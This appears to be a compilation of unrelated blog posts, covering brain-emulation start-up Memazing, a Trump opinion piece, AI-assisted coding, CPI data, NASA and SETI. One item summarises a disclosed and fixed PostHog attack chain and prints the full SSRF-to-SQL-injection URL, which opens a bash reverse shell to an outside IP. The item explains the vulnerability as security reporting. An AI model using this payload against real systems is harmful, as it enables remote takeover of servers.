I wasn’t here just for the story. It was actually my friend-from-the-internet’s birthday. Chairman Birb, as she’s known on social media, sported holographic pants and a sash that read “Birthed to mog.” The last time I got to hang with Birb was at a party for her press-on manicure product that contained an NFC chip. Despite being based in New York, she’s quintessentially SF, down to her own peptide stack.

Once my friends arrived, I was excited to show them the lab tour. We dashed upstairs just in time to watch the technician at the peptide injection demonstration actually inject himself, which he claimed was the only time that night he’d be doing such a thing. I asked him afterwards where the blood lady had gone. You can only draw your own blood so many times in one night, he explained.

At this point, I’d been dashing around San Francisco for 48 hours straight. Exhaustion hit. Still, we danced. Someone came up to my friend and asked if he wanted any molly. A pair in front of the DJ were making out aggressively. Knee-high boots stomped and swayed around us. I partied until I couldn’t anymore, then slipped into a driverless taxi and headed home.

The Next Step Toward Understanding The Nature Of Intelligence - EP 49 Sebastian Seung

Well, here we are. It’s brain uploading time.

As we’ve just reported, famed neuroscientist Sebastian Seung has created a new start-up called Memazing. The company has set out to build digital brains in software that are based upon the maps of animal brains. Memazing is, in effect, seeking to reverse engineer how animal brains work and to use this information to bring to life a new form of computerized intelligence.

This work could lead to, say, more energy efficient AI systems that are modeled on real brains. It could help with aligning AI systems with human intelligence. And it could be a major step toward creating emulations of full human brains and perhaps, one day, making minds uploadable.

We get into all of this with Seung on this week’s podcast. We also explore his decades of neuroscience work dedicated to building connectomes, or ultra-detailed schematics of animal brains and all their neurons and synapses.

Seung is brilliant and fascinating. Listen and/or watch for yourself.

The Core Memory podcast is available on all major platforms and our YouTube channel.

Our show is sponsored by Brex, the intelligent finance platform. Like thousands of ambitious, innovative companies, we run on Brex so we can spend smarter and move faster. And you can too. Learn more at www.brex.com/corememory

The podcast is also made possible by E1 Ventures, which backs the most ambitious founders and start-ups.

Exclusive: Connectome Pioneer Sebastian Seung Is Building A Digital Brain

On a Sunday evening earlier this month, a Stanford professor held a salon at her home near the university’s campus. The main topic for the event was “synthesizing consciousness through neuroscience,” and the home filled with dozens of people, including artificial intelligence researchers, doctors, neuroscientists, philosophers and a former monk, eager to discuss the current collision between new AI and biological tools and how we might identify the arrival of a digital consciousness.

The opening speaker for the salon was Sebastian Seung, and this made a lot of sense. Seung, a neuroscience and computer science professor at Princeton University, has spent much of the last year enjoying the afterglow of his (and others’) breakthrough research describing the inner workings of the fly brain. Seung, you see, helped create the first complete wiring diagram of a fly brain and its 140,000 neurons and 55 million synapses. (Nature put out a special issue last October to document the achievement and its implications.) This diagram, known as a connectome, took more than a decade to finish and stands as the most detailed look at the most complex whole brain ever produced.

During his talk, Seung presented some slides showing the fly connectome (they’re beautiful images) and discussed what scientists have started to learn about the brain with this map in hand. We’ve already discovered new types of neurons and novel patterns uniting form and function in the brain. Researchers have also started to recreate the connectome in software to run simulations of fly brain behavior. The adult female Drosophila used to make the connectome has become a major point of scientific focus and something of a neuroscience celebrity. “My joke is that one fly died for this map, but this is the first fly that will live forever,” Seung told the salon crowd.

An image from the fly connectome

What Seung did not reveal to the audience is that the fly connectome has given rise to his own new neuroscience journey. This week, he’s unveiling a start-up called Memazing, as we can exclusively report. The new company seeks to create the technology needed to reverse engineer the fly brain (and eventually even more complex brains) and create full recreations – or emulations, as Seung calls them - of the brain in software.

(Seung says the Memazing name is a play on “amazing memory” and the idea that the connectome is the “me maze” in the sense that our thoughts and memories are built and stored in the maze of synaptic connections.)

Seung contends that he’s chasing a new approach to understanding the nature of intelligence that’s in many ways opposite to the AI models that have arisen over the past few years. The AI models feed tens of thousands of processors with examples of intelligent behavior – such as huge volumes of text – and then tune the strengths of the relationships between the processors through repeated statistical optimization until intelligent behavior emerges.

Memazing, by contrast, has an existing map of how nature has produced intelligence over the course of millions of years of fine-tuning. It can see the strengths of the connections between neurons. Seung has already taken that information, inputted it into a computer model with great precision and begun to run experiments on that digital brain to see if he can stimulate the emulation and have it act like a real brain.

“We know that flies can see motion, run away from large objects and navigate,” Seung says. “We have to put the synapse counts in as weights and find out which other parameters we have to fiddle with in order to get the right actions to come out.

“If we did the simulation right, then hopefully intelligence will emerge.”
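Conceptually, this inverts the usual deep-learning recipe: the weights are measurements taken from the connectome, and only a handful of global parameters get tuned. A toy illustration of that idea (entirely schematic, with invented numbers; this is not Memazing's actual model):

```python
import math
import random

random.seed(0)
N = 5
# Stand-in for a measured connectome: synapse counts between N toy
# neurons. In the real project these come from the fly wiring diagram.
synapse_counts = [[random.randint(0, 9) for _ in range(N)] for _ in range(N)]

def simulate(gain, steps=50):
    # Weights come straight from the map - they are data, not learned.
    # Only the global gain is a free parameter to "fiddle with".
    weights = [[gain * c for c in row] for row in synapse_counts]
    rates = [0.1] * N  # initial firing rates
    for _ in range(steps):
        rates = [math.tanh(sum(w * r for w, r in zip(row, rates)))
                 for row in weights]
    return rates

print(simulate(gain=0.05))
```

Gradient descent never appears: the open question is whether fixed measured weights plus a few tuned global parameters are enough to reproduce behavior.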

It’s early days for Memazing. Seung has assembled a team of a few people and is currently in the process of raising funds for his new venture. He’s also not alone. Over the past few weeks, I’ve caught word of at least two other connectome specialists hoping to spin up new companies that also want to use the fly data to try and build digital minds.

Whether this approach to engineering intelligence results in something spectacular is anyone’s guess. The people chasing this type of work, though, are hoping that knowledge gleaned from animal brains could translate into better AI systems. Animal brains, fed by a relatively small number of calories, remain far more efficient at processing information than the massive data centers fueling AI models. Perhaps emulating the fly brain will help unlock more clues about how animal brains do their work so well.

“The cost of AI has a lot of important implications,” Seung says. “It’s the difference between an AI that’s really centralized and requires a huge amount of investment and is controlled by a few corporations as opposed to AI everywhere. Intelligence too cheap to meter, right? I think slashing the cost of AI is one of the big motivations for us right now.”

On another front, people argue that understanding animal brains better could allow us to create tighter alignment between human and artificial intelligences. We could somehow bake humanness into AIs, and the AIs would then be more inclined to work with us instead of against us. More on the sci-fi spectrum, a number of people hope that the creation of these digitized brains could make it more feasible to upload minds into silicon substrates so that we might, well, live forever.

Seung and fellow neuroscientist Doris Tsao at the salon

“The ultimate goal, of course, is to enable and power humanity to transcend biology,” Seung says. “So human brain emulation is the ultimate goal of the quest.”

Scientists created a full connectome of a worm brain about 40 years ago. It took decades to produce a connectome for the more complex fly brain, in part, because of the painstaking nature of the work. Connectomes are built by shaving off incredibly thin slices of brains, imaging the slices under electron microscopes and then reassembling the images via software into 3D models. Once you have the model, you then must trace and label the wiring of neurons and synapses, which is another brutal task. The human brain, for example, has millions of miles of wiring compacted into a skull-sized case, and you have to make sense of that entangled mess and produce a readable map.

Seung and his team pioneered a number of techniques to use AI software to help label the neurons and synapses of the fly brain. Several start-ups and research organizations are now trying to develop new imaging and labeling techniques in a bid to make building maps of things like mouse and human brains easier. Seung hopes that this influx of new data will accelerate his own work, although it’s possible that the fly connectome could provide enough information to make great leaps forward.

“Ideally, we’ll get human brain emulation when the human connectome is done,” he says. “But it could be the case that we find the principles of brain emulation with small brains and scale them up.”

Seung and his team have already begun work on their fly brain emulation, and they have started connecting their model to a simple robotics system. Over time, they would like to stimulate their digitized brain and see if it produces the right physical reaction in their robots. If, for example, you mimic coming at the fly with a swatter, can you get the robot to try to fly away?

Kenneth Hayworth, a neuroscientist at the Janelia Research Campus, cautioned that Seung and others have a lot of effort ahead of them. “With the fruit fly, we really do have all the hooks that would be necessary to really understand it,” he says. “But I still think it’s a long way off. Neuroscience is extremely difficult. When you push up against experimentation, things tend to fall apart in weird ways. I think it will take quite some time to develop a full understanding of how the fruit fly works.”

That said, Hayworth encouraged this type of research and said it’s exactly where scientists should be going with the fly connectome in hand. “Drosophila is an excellent target for the type of basic neuroscience that we need,” he says. “We are on that long road to eventually understanding brains and to do mind uploading. It will succeed eventually, but it will take a long time – maybe a hundred years.”

Seung is accustomed to facing some measure of skepticism around his work. Neuroscientists spent years questioning the value of creating animal connectomes. The brain maps only capture a single moment in time of a dead animal. We would learn far more about how the brain works by observing its behavior in real-time, although such research is very hard to do in practice.

The creation of the fly connectome, however, has justified much of Seung’s faith in this field of study as all types of new insights about the brain have appeared over the past year. Seung expects that new data and new insights will come at a steady pace as advances in AI and neuroscience play off each other.

“The connectomes are scaling up, and the data from academic labs and start-ups is growing exponentially,” Seung said. “We’re going to have all this fuel in which to feed the brain emulations because of all this commercialization going on.”

Why Trump’s Viciousness Matters

My first reaction upon reading Donald Trump’s despicable statement on the murders of Rob Reiner and his wife Michele was a sense of both shock and lack of surprise. It wasn’t news to me that the president of the United States is a vicious shmuck. My second reaction was the thought that I have nothing new to contribute here, as plenty of other people were already denouncing yet another example of Trump’s vindictive narcissism.

Yet, on reflection, I realized that there’s a story here that’s bigger than Trump, a story in which Trump is one especially egregious example of a larger pattern. What is that pattern? That being vicious and bigoted is cool, is “based” in current slang. Trump is one data point in the midst of an epidemic of performative hatemongering in America. And while most of this is emanating from right-wing extremists, not all of it is.

I am not going to present some rose-tinted, Pollyannaish view of America’s past here. There were people who crowed over the assassination of Martin Luther King Jr. For most of our history there were Americans who reveled in harming, subjugating and dispossessing those who were considered of the wrong race, ethnicity, religion, sexual orientation or gender identity. But we, as a country, changed. Over time, Americans on the whole became more humane and tolerant.

It’s true that significant numbers of Americans were never fully on board with liberal humanism. For example, a majority of white Americans didn’t approve of interracial marriage until 1997. However, we were slowly becoming a country in which open bigotry was frowned upon. Although we were never perfect, there was a growing sense of norms that contained any underlying hatred.

Now the impulse to hate is back. For example, according to a long-running survey conducted by NORC and the ADL, antisemitism has been making a big comeback:

Antisemitic Attitudes in America 2024

Source

And Trump has made innumerable crudely racist comments about Black Americans, particularly about Black American women. He’s demonized immigrants and Muslims, and suggested Democratic politicians should be executed. But the resurgence of hate speech isn’t just about Trump, nor is it solely about politics. Grown men — it’s mostly, although not only, men — now feel free to be publicly cruel and vindictive, spouting childish insults against whomever they dislike.

Why is this happening? The rise of social media is one significant factor in making it far easier for the like-minded to find one another and magnify their hate.

The app formerly known as Twitter is thoroughly infested with bigots and bots, and all too many people who immerse themselves in that toxic environment end up internalizing the viciousness. Even right-wing activists like Chris Rufo are complaining that X has been “increasingly hijacked by bad actors who peddle baseless conspiracies and indulge their personal psychopathologies.” And G. Elliott Morris’s Substack “Strength in Numbers” has an excellent post on how Fox News polarized American voters and helped break American politics.

However, media alone are not to blame. I’ve been reading the British economist Simon Wren-Lewis, who has been writing about “the growing acceptability of xenophobic discourse” in the UK. His thesis is that there have always been a substantial number of people in Britain — and, surely, in every Western nation — who are socially reactionary and racist. In the past, however, mainstream political parties refused to associate themselves with anyone espousing such views. Eventually the cynical search for votes led to a breakdown of this cordon sanitaire — the Germans call their equivalent the Brandmauer, or firewall — and the latent viciousness broke into the open.

In a follow-up post Wren-Lewis, citing the work of the political scientist Vicente Valentim, acknowledges that broader social norms, largely established after World War II, also made overt racism and other forms of bigotry unacceptable in the public sphere. Even people who were privately cruel and bigoted – some of them in influential positions – felt obliged to be hypocrites and hide their true nature.

In time, however, events, ranging from the Syrian refugee crisis in Germany to the election of America’s first Black president, loosened the grip of these social norms. The already-existing pool of cruelty and bigotry, which had previously been veiled by hypocrisy, came back into full view.

A similar phenomenon is occurring in the US, where some Trump supporters are gleeful that Trump’s presidency will allow them to drop the veil of hypocrisy. For example, the Financial Times reported on the reasons some on Wall Street were welcoming Trump’s return:

“I feel liberated,” said a top banker. “We can say ‘retard’ and ‘pussy’ without the fear of getting cancelled . . . it’s a new dawn.”

But where I would differ from Wren-Lewis’s analysis — although I’m not sure Simon would disagree — is that he implicitly treats the number of reactionaries and bigots as immutable. In fact, as G. Elliott Morris likes to point out, ordinary voters’ positions on issues — and, I’d argue, elites’ positions too — are far less fixed than political strategists tend to assume. They can and do shift greatly based on what people hear.

If this is true, then the world in which we lived until recently was a world in which the general public was steered away from the worst bigotry because, over time, it had been made socially unacceptable. Yes, there was substantial hypocrisy lurking below the surface, but the hypocrisy was a useful tool that reduced the amount of violent and hate-filled rhetoric.

Now, Trump is purposely breaking norms and engaging in open expressions of hate and bigotry. And among a set of people, this serves as a signal that it’s now socially acceptable to do the same – look, for example, at the extremely racist and Nazi-praising chats among young Republican activists leaked to Politico. While these young MAGA-landers were outed and chastised, it’s clear that within MAGA-world emulating Trump’s hate-filled rhetoric is considered a way of signaling that you are loyal to the movement.

And it’s also clear that if Trumpism persists, we are facing a future in which such behavior is no longer publicly unacceptable. Because Trump’s remarks about the murder of the Reiners weren’t just his personal venting. They were a symptom and a symbol of his systematic destruction of our norms, our humanism, just as he tried to destroy the norms of American democracy on January 6, 2021. It’s a profoundly nihilistic vision for America.

And one of these days, I predict, history will judge harshly those who stayed silent.

Addendum: Trump gave a speech on the economy last night. It was nasty, brutish but mercifully short. It was, of course, full of lies. Were there any true factual claims? So far I haven’t found any. And it closed out with ugly claims about immigrants. A few more words about it tomorrow.

MUSICAL CODA

Your job is to deliver code you have proven to work

In all of the debates about the value of AI-assistance in software development there's one depressing anecdote that I keep on seeing: the junior engineer, empowered by some class of LLM tool, who deposits giant, untested PRs on their coworkers - or open source maintainers - and expects the "code review" process to handle the rest.

This is rude, a waste of other people's time, and is honestly a dereliction of duty as a software developer.

Your job is to deliver code you have proven to work.

As software engineers we don't just crank out code - in fact these days you could argue that's what the LLMs are for. We need to deliver code that works - and we need to include proof that it works as well. Not doing that directly shifts the burden of the actual work to whoever is expected to review our code.

How to prove it works

There are two steps to proving a piece of code works. Neither is optional.

The first is manual testing. If you haven't seen the code do the right thing yourself, that code doesn't work. If it does turn out to work, that's honestly just pure chance.

Manual testing skills are genuine skills that you need to develop. You need to be able to get the system into an initial state that demonstrates your change, then exercise the change, then check and demonstrate that it has the desired effect.

If possible I like to reduce these steps to a sequence of terminal commands which I can paste, along with their output, into a comment in the code review. Here's a recent example.

Some changes are harder to demonstrate. It's still your job to demonstrate them! Record a screen capture video and add that to the PR. Show your reviewers that the change you made actually works.

Once you've tested the happy path where everything works you can start trying the edge cases. Manual testing is a skill, and finding the things that break is the next level of that skill that helps define a senior engineer.

The second step in proving a change works is automated testing. This is so much easier now that we have LLM tooling, which means there's no excuse at all for skipping this step.

Your contribution should bundle the change with an automated test that proves the change works. That test should fail if you revert the implementation.

The process for writing a test mirrors that of manual testing: get the system into an initial known state, exercise the change, assert that it worked correctly. Integrating a test harness to productively facilitate this is another key skill worth investing in.
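That arrange/exercise/assert shape is the same in any framework. A generic sketch (the slugify function is invented purely for illustration):

```python
import re

def slugify(title: str) -> str:
    """The change being proven: turn a title into a URL slug.
    Hypothetical example code, not from any real project."""
    return re.sub(r"[^a-z0-9]+", "-", title.lower()).strip("-")

def test_slugify_collapses_punctuation():
    # 1. Known initial state: a title with mixed case and punctuation
    title = "Hello, World! (Again)"
    # 2. Exercise the change
    slug = slugify(title)
    # 3. Assert it worked - this fails if the implementation is reverted
    assert slug == "hello-world-again"
```

Reverting the slugify change makes the assertion fail, which is exactly the property you want from the bundled test.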

Don't be tempted to skip the manual test because you think the automated test has you covered already! Almost every time I've done this myself I've quickly regretted it.

Make your coding agent prove it first

The most important trend in LLMs in 2025 has been the explosive growth of coding agents - tools like Claude Code and Codex CLI that can actively execute the code they are working on to check that it works and further iterate on any problems.

To master these tools you need to learn how to get them to prove their changes work as well.

This looks exactly the same as the process I described above: they need to be able to manually test their changes as they work, and they need to be able to build automated tests that guarantee the change will continue to work in the future.

Since they're robots, automated tests and manual tests are effectively the same thing.

They do feel a little different though. When I'm working on CLI tools I'll usually teach Claude Code how to run them itself so it can do one-off tests, even though the eventual automated tests will use a system like Click's CliRunner.
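For reference, the CliRunner pattern looks something like this (the hello command is invented for illustration, and this assumes Click is installed):

```python
import click
from click.testing import CliRunner

@click.command()
@click.argument("name")
def hello(name):
    """Hypothetical CLI command used only for this illustration."""
    click.echo(f"Hello, {name}!")

def test_hello():
    # CliRunner invokes the command in-process and captures its output,
    # so the test doesn't need to spawn a subprocess
    runner = CliRunner()
    result = runner.invoke(hello, ["world"])
    assert result.exit_code == 0
    assert result.output == "Hello, world!\n"
```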

When working on CSS changes I'll often encourage my coding agent to take screenshots when it needs to check if the change it made had the desired effect.

The good news about automated tests is that coding agents need very little encouragement to write them. If your project has tests already most agents will extend that test suite without you even telling them to do so. They'll also reuse patterns from existing tests, so keeping your test code well organized and populated with patterns you like is a great way to help your agent build testing code to your taste.

Developing good taste in testing code is another of those skills that differentiates a senior engineer.

The human provides the accountability

A computer can never be held accountable. That's your job as the human in the loop.

Almost anyone can prompt an LLM to generate a thousand-line patch and submit it for code review. That's no longer valuable. What's valuable is contributing code that is proven to work.

Next time you submit a PR, make sure you've included your evidence that it works as it should.

Tags: programming, careers, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, coding-agents

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain


Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.

The way in abuses a webhooks system with non-robust URL validation, setting up an SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.

Here's the URL that gets injected:

http://clickhouse:8123/?query=SELECT+*+FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+>%26+/dev/tcp/172.31.221.180/4444+0>%261\\"$$;SELECT+*+FROM+cmd_exec;+--\",'posthog','posthog')#

Reformatted a little for readability:

http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
    'db:5432',
    'posthog',
    "posthog_use')) TO STDOUT;
    END;
    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec (
        cmd_output text
    );
    COPY cmd_exec
    FROM PROGRAM $$
        bash -c \"bash -i >& /dev/tcp/172.31.221.180/4444 0>&1\"
    $$;
    SELECT * FROM cmd_exec;
    --",
    'posthog',
    'posthog'
)
#

This abuses ClickHouse's ability to run its own queries against PostgreSQL using the postgresql() table function, combined with an escaping bug in ClickHouse's postgresql() function (since fixed). Then that query abuses PostgreSQL's ability to run shell commands via COPY ... FROM PROGRAM.

The bash -c bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.
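As an illustration of the kind of URL validation that blocks this entry point, here is a hedged sketch in Python. This is not PostHog's actual fix, and the function name is invented; it shows the general technique of resolving a webhook hostname and rejecting private or reserved addresses:

```python
# Hedged sketch of one common SSRF mitigation: resolve the webhook
# target and reject private, loopback, link-local, or reserved
# addresses. Illustrative only; NOT PostHog's actual fix.
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_webhook_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, parsed.port or 80)
    except socket.gaierror:
        return False  # reject unresolvable hostnames
    for _family, _type, _proto, _canon, sockaddr in infos:
        # sockaddr[0] is the IP string; strip any IPv6 zone id like %eth0
        addr = ipaddress.ip_address(sockaddr[0].split("%")[0])
        if (addr.is_private or addr.is_loopback
                or addr.is_link_local or addr.is_reserved):
            return False
    return True
```

Note that a check like this is only safe if the HTTP client then connects to the vetted IP address (or re-checks at connect time); re-resolving the hostname later reopens the hole via DNS rebinding.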

Via Hacker News

Tags: postgresql, security, webhooks, clickhouse

AoAH Day 15: Porting a complete HTML5 parser and browser test suite


Anil Madhavapeddy is running an Advent of Agentic Humps this year, building a new useful OCaml library every day for most of December.

Inspired by Emil Stenström's JustHTML and my own coding agent port of that to JavaScript he coined the term vibespiling for AI-powered porting and transpiling of code from one language to another and had a go at building an HTML5 parser in OCaml, resulting in html5rw which passes the same html5lib-tests suite that Emil and myself used for our projects.

Anil's thoughts on the copyright and ethical aspects of this are worth quoting in full:

The question of copyright and licensing is difficult. I definitely did some editing by hand, and a fair bit of prompting that resulted in targeted code edits, but the vast amount of architectural logic came from JustHTML. So I opted to make the LICENSE a joint one with Emil Stenström. I did not follow the transitive dependency through to the Rust one, which I probably should.

I'm also extremely uncertain about ever releasing this library to the central opam repository, especially as there are excellent HTML5 parsers already available. I haven't checked if those pass the HTML5 test suite, because this is wandering into the agents vs humans territory that I ruled out in my groundrules. Whether or not this agentic code is better or not is a moot point if releasing it drives away the human maintainers who are the source of creativity in the code!

I decided to credit Emil in the same way for my own vibespiled project.

Via @avsm

Tags: definitions, functional-programming, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, ocaml

Meet the American investors rushing into Congo

They are taking on war, corruption and China

This Christmas, raise a glass to concentrated market returns

A surprisingly large share of companies lag far behind their former greatness

YoY Measures of Inflation: Services, Goods and Shelter

SPECIAL NOTE: October prices (data not collected) were averaged between September and November for these graphs.

Here are a few measures of inflation:

The first graph is the one Fed Chair Powell had mentioned two years ago as something to watch.  

Services ex-Shelter: Click on graph for larger image.

This graph shows the YoY price change for Services and Services less rent of shelter through November 2025.

Services were up 3.2% YoY as of November 2025, down from 3.6% YoY in September.

Services less rent of shelter was up 3.5% YoY in November, down from 3.7% YoY in September.

Goods CPI: The second graph shows that goods prices started to increase year-over-year (YoY) in 2020 and accelerated in 2021 due to both strong demand and supply chain disruptions.

Now the YoY change in prices is increasing due to tariffs.

Durables were up 1.5% YoY as of November 2025, down from 1.8% YoY in September.

Commodities less food and energy commodities were at 1.4% YoY in November, down from 1.5% YoY in September.

Shelter: Here is a graph of the year-over-year change in shelter from the CPI report (through November) and housing from the PCE report (through September).

Shelter was up 3.0% year-over-year in November, down from 3.6% in September. Housing (PCE) was up 3.4% YoY in September, down from 3.9% in August.

This is still catching up with private new-lease data (CPI shelter includes renewals, whereas the private data is mostly for new leases).

Core CPI ex-shelter was up 2.3% YoY in November, down from 2.6% YoY in September.

Weekly Initial Unemployment Claims Decrease to 224,000

The DOL reported:
In the week ending December 13, the advance figure for seasonally adjusted initial claims was 224,000, a decrease of 13,000 from the previous week's revised level. The previous week's level was revised up by 1,000 from 236,000 to 237,000. The 4-week moving average was 217,500, an increase of 500 from the previous week's revised average. The previous week's average was revised up by 250 from 216,750 to 217,000.
emphasis added
The following graph shows the 4-week moving average of weekly claims since 1971.

Click on graph for larger image.

The dashed line on the graph is the current 4-week average. The four-week average of weekly unemployment claims increased to 217,500.

BLS: CPI Increased 0.2% Over 2 Months; Core CPI increased 0.2%

From the BLS:
The Consumer Price Index for All Urban Consumers (CPI-U) increased 0.2 percent on a seasonally adjusted basis over the 2 months from September 2025 to November 2025, the U.S. Bureau of Labor Statistics reported today. Over the last 12 months, the all items index increased 2.7 percent before seasonal adjustment. BLS did not collect survey data for October 2025 due to a lapse in appropriations.

The seasonally adjusted index for all items less food and energy rose 0.2 percent over the 2 months ending in November. From September to November, the index for shelter increased 0.2 percent. The energy index rose 1.1 percent over the same 2-month period and the food index increased 0.1 percent. Other indexes which increased over the 2 months ending in November include household furnishings and operations, communication, and personal care. In contrast, the indexes for lodging away from home, recreation, and apparel decreased over the same 2-month period.

The all items index rose 2.7 percent for the 12 months ending November, after rising 3.0 percent over the 12 months ending September. The all items less food and energy index rose 2.6 percent over the last 12 months. The energy index increased 4.2 percent for the 12 months ending November. The food index increased 2.6 percent over the last year.
emphasis added
The change in CPI was below expectations. I'll post a graph later today after the Cleveland Fed releases the median and trimmed-mean CPI.

Watch who you’re calling childless

Women in America are having as many babies over their lifetimes as they did two decades ago

Senate confirms Jared Isaacman as 15th NASA Administrator

Jared Isaacman, President Donald Trump’s nominee to be the next administrator of NASA, appears before the Senate Committee on Commerce, Science, and Transportation, Wednesday, Dec. 3, 2025, at the Russell Senate Office Building in Washington. Image: NASA/Joel Kowsky

Jared Isaacman was confirmed by the U.S. Senate to be NASA’s newest administrator on Wednesday afternoon.

The commercial astronaut, entrepreneur, and philanthropist received 67 votes of approval with 30 senators voting against his confirmation.

“For nearly 70 years, the United States has been at the forefront of space exploration. President Trump knows how critical it is to reinvigorate NASA as we aim to reach new heights in the greatest frontier ever known, and that’s why he chose exactly the right man for the job,” wrote Sen. Tim Sheehy (R-MT) in a social media post shortly after the vote.

“I’m proud to see [Jared Isaacman] confirmed as our NASA administrator and confident he will work tirelessly to ensure America wins the 21st century space race.”

Messages of support came in swiftly for Isaacman, ranging from industry members to special interest groups, like the American Institute for Aeronautics and Astronautics and the Planetary Society.

“After nearly a year of historic disruptions to the agency’s workforce, facilities, and budget, Mr. Isaacman has the opportunity to stabilize and reinvigorate the U.S. space program,” the Planetary Society wrote in a social media statement. “Congress is on a path to provide Mr. Isaacman with a restored budget that better funds national priorities: returning humans to the Moon, maintaining U.S. leadership in space science and exploration, and training the next generation of scientists and aerospace engineers.

“This is a remarkable statement of support for NASA’s mission, and Mr. Isaacman publicly committed to make full use of the funds that Congress provides.”

A date for Isaacman’s official swearing in ceremony hasn’t been announced, but is expected soon, potentially before the Christmas holiday.

Isaacman was first announced as President Donald Trump’s pick for the position of NASA Administrator on Dec. 4, 2024, and sat for his first confirmation hearing on April 9.

About a month and a half later, the President withdrew that nomination amid the backdrop of a very public falling out with SpaceX founder and one of Trump’s biggest political donors, Elon Musk.

Isaacman was renominated to the position on Nov. 4 and had a second confirmation hearing less than a month later.

Secretary of Transportation Sean Duffy was named acting administrator replacing the interim Administrator, Janet Petro, who returned to her role as director of the Kennedy Space Center in Florida.

“Congratulations to Jared Isaacman on his confirmation as NASA Administrator,” Duffy wrote in a social media post. “It’s been an honor to help drive [The President’s]’ vision for American leadership in space. I wish Jared success as he begins his tenure and leads NASA as we go back to the Moon in 2028 and beat China.”

A busy time ahead

Isaacman will step into the Administrator role at an inflection point for the agency, with Congress and the Trump Administration pushing in different directions. A reduction in the NASA workforce and brutal budget cuts will also create a challenging environment.

Most immediately, NASA is on the cusp of launching the Artemis 2 mission, the first crewed flight of the Orion spacecraft, which will fly around the Moon and back to Earth on a 10-day mission, as soon as early February.

From left, Sean McCrary and Katie Mortensen, mechanical engineering technicians, paint NASA’s Artemis logo on the White Room connected to the crew access arm and mobile launcher inside the Vehicle Assembly Building at NASA’s Kennedy Space Center in Florida on Thursday, Dec. 4, 2025. The White Room is the area where the Artemis 2 crew Reid Wiseman, Victor Glover, Christina Koch, and CSA (Canadian Space Agency) astronaut Jeremy Hansen will enter the Orion spacecraft ahead of launch from Launch Complex 39B at NASA Kennedy in early 2026. Image: NASA/Frank Michaux

Across his two confirmation hearings, Isaacman faced numerous questions about his views on the Artemis program, which uses the Space Launch System (SLS) rocket and Orion spacecraft for lunar expeditions.

In his list of questions for the record following Isaacman’s second nomination hearing, Sen. Katie Britt (R-AL) pushed Isaacman on his support for using the SLS rocket through the Artemis 5 mission. She noted that he’d previously talked about the potential for using commercial heavy lift rockets on the Artemis 4 and Artemis 5 missions.

“SLS is the fastest path to achieving America’s near-term lunar objectives through Artemis 5,” Isaacman wrote in response. “Pivoting to another architecture earlier than contemplated in the One Big Beautiful Bill could place the nation at an unacceptable risk of a strategic capability gap. I will, of course, follow the law.”

On the other side of the aisle, Sen. Maria Cantwell (D-WA) asked Isaacman about the initiative started by Duffy to reopen the competition for the Artemis 3 Human Landing System (HLS) contract. NASA confirmed that it had received proposals for expedited landing options from SpaceX and Blue Origin and would seek input from the broader industry in time.

“If confirmed, I fully intend to solicit feedback from all commercial partners on ways to reduce requirements and remove obstacles that impede America’s near-term lunar objectives,” Isaacman wrote in response. “This applies not only to Blue Origin and SpaceX, but to Lockheed Martin, Boeing, Northrop, and every other vendor contributing to Artemis and NASA’s broader mission.

“As I stated during the hearing, America is best served when both HLS providers are able to compete–and as a nation, we must select the first landing system ready to ensure the United States returns to the Moon before China.”

An artist’s rendering of the Human Landing System version of Starship docking with NASA’s Orion spacecraft in lunar orbit. Graphic: SpaceX

Isaacman also faces challenges with NASA’s science budget. The President’s Budget Request, issued earlier this year, proposed deep cuts to science, with the Earth science portion taking a heavy reduction.

Asked by Sen. Dan Sullivan (R-AK) about the President’s proposal to eliminate the Office of STEM Engagement (OSTEM) and reduce the funding to the NASA Research Opportunities in Space and Earth Sciences (ROSES) program, Isaacman said the following:

“If confirmed, I can commit to being an advocate for science and a strong American workforce and will do all I can to maximize the scientific value of every dollar provided by Congress.”

New Uses for the Eschaton


One way to examine problems with huge unknowns – SETI is a classic example – is through the construction of a so-called ‘toy model.’ I linger a moment on the term because I want to purge the notion that it implies a lightweight conclusion. A toy model simplifies details to look for the big picture. It can be a useful analytical tool, a way of screening out some of the complexities in order to focus on core issues. And yes, it’s theoretical and idealized, not predictive.

But sometimes a toy model offers approaches we might otherwise miss. Consider how many variables we have to work with in SETI. What kind of signaling strategy would an extraterrestrial civilization choose? What sort of timeframe would it operate under? What cultural values determine its behavior? What is its intent? You can see how long this list can become. I’ll stop here.

The toy model I want to focus on today is one David Kipping uses in a new paper called “The Eschatian Hypothesis.” The term refers to what we might call ‘final things.’ Eschaton is a word that turns up in both cosmology and theology, in the former case talking about issues like the ultimate fate of the cosmos. So when Kipping (Columbia University) uses it in a SETI context, he’s going for the broadest possible approach, the ‘big picture’ of what a detection would look like.

I have to pause here for a moment to quote science fiction writer Charles Stross, who finds uses for ‘eschaton’ in his Singularity Sky (Ace, 2004), to wit:

I am the Eschaton. I am not your God.
I am descended from you, and exist in your future.
Thou shalt not violate causality within my historic light cone. Or else.

Love the ‘or else.’

Let’s now dig into the new paper. Published in Research Notes of the AAS, the paper homes in on a kind of bias that haunts our observations. Consider that the first exoplanets ever found were at the pulsar PSR 1257+12. Or the fact that the first main sequence star with a planet was found to host a ‘hot Jupiter,’ which back in 1995, when 51 Pegasi b was discovered, wasn’t even a category anyone ever thought existed. The point is that we see the atypical first precisely because such worlds are so extreme. While our early population of detections is packed with hot Jupiters, we have learned that these worlds are in fact rarities. We begin to get a feel for the distribution of discoveries.

